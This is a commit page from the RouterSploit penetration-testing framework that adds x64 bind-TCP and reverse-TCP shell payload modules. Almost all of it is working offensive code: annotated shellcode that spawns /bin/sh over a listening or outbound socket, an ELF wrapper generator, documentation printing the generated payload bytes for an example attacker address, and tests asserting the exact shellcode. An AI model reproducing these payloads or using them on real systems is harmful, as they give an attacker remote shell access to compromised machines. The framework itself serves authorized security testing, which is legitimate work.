Skip to content

R
routersploit
Unverified Commit 4e77c24a by Marcin Bury Committed by GitHub
Options

Payloads x64 (#455) 

* Adding x64 payloads

* Fixing x64 bind and reverse payloads, adding tests and docs
parent 5eeb6e9e
Showing with 302 additions and 7 deletions
docs/modules/payloads/x64/bind_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp bind shell for X64 architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/x64/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates x64 bind shell tcp payload
## Scenarios
```
rsf > use payloads/x64/bind_tcp
rsf (X64 Bind TCP) > set rport 4321
[+] rport => 4321
rsf (X64 Bind TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
"\xc7\x04\x24\x02\x00\x10\xe1\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
```
docs/modules/payloads/x64/reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell for X64 architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/x64/reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Module generates x64 reverse shell tcp payload
## Scenarios
```
rsf > use payloads/x64/reverse_tcp
rsf (X64 Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (X64 Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (X64 Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
```
routersploit/core/exploit/payloads.py
......@@ -72,6 +72,16 @@ ARCH_ELF_HEADERS = {
b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08"
b"\x00\x80\x04\x08\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
b"\x00\x10\x00\x00"
),
Architectures.X64: (
b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00\x00\x00"
b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00\x00\x00\x00\x00"
b"\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00"
b"\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42"
b"\x00\x10\x00\x00\x00\x00\x00\x00"
)
}
......@@ -155,14 +165,25 @@ class ArchitectureSpecificPayload(BasePayload):
def generate_elf(self, data):
elf = self.header + data
if self.bigendian:
p_filesz = pack(">L", len(elf))
p_memsz = pack(">L", len(elf) + len(data))
else:
p_filesz = pack("<L", len(elf))
p_memsz = pack("<L", len(elf) + len(data))
if elf[4] == 1: # ELFCLASS32 - 32 bit
if self.bigendian:
p_filesz = pack(">L", len(elf))
p_memsz = pack(">L", len(elf) + len(data))
else:
p_filesz = pack("<L", len(elf))
p_memsz = pack("<L", len(elf) + len(data))
content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
elif elf[4] == 2: # ELFCLASS64 - 64 bit
if self.bigendian:
p_filesz = pack(">Q", len(elf))
p_memsz = pack(">Q", len(elf) + len(data))
else:
p_filesz = pack("<Q", len(elf))
p_memsz = pack("<Q", len(elf) + len(data))
content = elf[:0x60] + p_filesz + p_memsz + elf[0x70:]
content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
return content
@staticmethod
......
routersploit/modules/payloads/x64/bind_tcp.py 0 → 100644
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
ArchitectureSpecificPayload,
Architectures,
BindTCPPayloadMixin,
)
class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = {
"name": "X64 Bind TCP",
"description": "Creates interactive tcp bind shell for X64 architecture.",
"authors": (
"ricky", # metasploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
)
}
architecture = Architectures.X64
def generate(self):
bind_port = utils.convert_port(self.rport)
return (
b"\x6a\x29" + # pushq $0x29
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x6a\x02" + # pushq $0x2
b"\x5f" + # pop %rdi
b"\x6a\x01" + # pushq $0x1
b"\x5e" + # pop %rsi
b"\x0f\x05" + # syscall
b"\x48\x97" + # xchg %rax,%rdi
b"\x52" + # push %rdx
b"\xc7\x04\x24\x02\x00" + # movl $0xb3150002,(%rsp)
bind_port + # port
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x6a\x10" + # pushq $0x10
b"\x5a" + # pop %rdx
b"\x6a\x31" + # pushq $0x31
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x6a\x32" + # pushq $0x32
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x48\x31\xf6" + # xor %rsi,%rsi
b"\x6a\x2b" + # pushq $0x2b
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x48\x97" + # xchg %rax,%rdi
b"\x6a\x03" + # pushq $0x3
b"\x5e" + # pop %rsi
b"\x48\xff\xce" + # dec %rsi
b"\x6a\x21" + # pushq $0x21
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x75\xf6" + # jne 33 <dup2_loop>
b"\x6a\x3b" + # pushq $0x3b
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x48\xbb\x2f\x62\x69\x6e\x2f" + # movabs $0x68732f6e69622f,%rbx
b"\x73\x68\x00" + #
b"\x53" + # push %rbx
b"\x48\x89\xe7" + # mov %rsp,%rdi
b"\x52" + # push %rdx
b"\x57" + # push %rdi
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x0f\x05" # syscall
)
routersploit/modules/payloads/x64/reverse_tcp.py 0 → 100644
from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
ArchitectureSpecificPayload,
Architectures,
ReverseTCPPayloadMixin,
)
class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
__info__ = {
"name": "X64 Reverse TCP",
"description": "Creates interactive tcp reverse shell for X64 architecture.",
"authors": (
"ricky", # metasploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
)
}
architecture = Architectures.X64
def generate(self):
reverse_ip = utils.convert_ip(self.lhost)
reverse_port = utils.convert_port(self.lport)
return (
b"\x6a\x29" + # pushq $0x29
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x6a\x02" + # pushq $0x2
b"\x5f" + # pop %rdi
b"\x6a\x01" + # pushq $0x1
b"\x5e" + # pop %rsi
b"\x0f\x05" + # syscall
b"\x48\x97" + # xchg %rax,%rdi
b"\x48\xb9\x02\x00" + # movabs $0x100007fb3150002,%rcx
reverse_port + # port
reverse_ip + # ip
b"\x51" + # push %rcx
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x6a\x10" + # pushq $0x10
b"\x5a" + # pop %rdx
b"\x6a\x2a" + # pushq $0x2a
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x6a\x03" + # pushq $0x3
b"\x5e" + # pop %rsi
b"\x48\xff\xce" + # dec %rsi
b"\x6a\x21" + # pushq $0x21
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x75\xf6" + # jne 27 <dup2_loop>
b"\x6a\x3b" + # pushq $0x3b
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x48\xbb\x2f\x62\x69\x6e\x2f" + # movabs $0x68732f6e69622f,%rbx
b"\x73\x68\x00" + #
b"\x53" + # push %rbx
b"\x48\x89\xe7" + # mov %rsp,%rdi
b"\x52" + # push %rdx
b"\x57" + # push %rdi
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x0f\x05" # syscall
)
tests/payloads/x64/test_bind_tcp.py 0 → 100644
from routersploit.modules.payloads.x64.bind_tcp import Exploit
# bind tcp payload with rport=4321
bind_tcp = (
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
b"\xc7\x04\x24\x02\x00\x10\xe1\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
b"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
b"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
b"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
b"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
# elf x64 bind tcp
elf_x64_bind_tcp = (
b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00"
b"\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
b"\x40\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x24"
b"\x01\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
b"\xc7\x04\x24\x02\x00\x10\xe1\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
b"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
b"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
b"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
b"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.rport = 4321
assert payload.generate() == bind_tcp
assert payload.generate_elf(bind_tcp) == elf_x64_bind_tcp
tests/payloads/x64/test_reverse_tcp.py 0 → 100644
from routersploit.modules.payloads.x64.reverse_tcp import Exploit
# reverse tcp with lhost=192.168.1.4 lport=4321
reverse_tcp = (
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
b"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
b"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
b"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
# elf x64 reverse tcp
elf_x64_reverse_tcp = (
b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00"
b"\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
b"\x40\x00\x00\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x0c"
b"\x01\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
b"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
b"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
b"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Exploit()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
assert payload.generate_elf(reverse_tcp) == elf_x64_reverse_tcp
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment